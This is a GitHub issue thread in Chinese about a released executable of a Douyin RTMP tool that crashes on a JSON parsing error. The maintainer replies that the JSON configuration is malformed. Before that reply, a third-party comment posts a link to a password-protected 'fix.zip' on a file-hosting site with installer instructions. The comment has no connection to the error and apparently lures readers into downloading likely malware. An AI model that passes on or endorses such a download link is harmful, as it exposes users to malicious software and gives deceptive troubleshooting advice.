### ISSUE TITLE
大佬，Releases中下载的可执行文件，运行报错了

### ISSUE THREAD

**Issue by sky22333** [LFMJUN/douyin_rtmp#2]
**报错信息：**
```
PS C:\Users\aaaaaa\Downloads> .\main.exe
Traceback (most recent call last):
  File "main.py", line 11, in <module>
  File "json\__init__.py", line 346, in loads
  File "json\decoder.py", line 337, in decode
  File "json\decoder.py", line 353, in raw_decode
json.decoder.JSONDecodeError: Invalid \escape: line 2 column 23 (char 24)
[154420] Failed to execute script 'main' due to unhandled exception!
```

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LFMJUN** [comment]
json配置有误，检查json
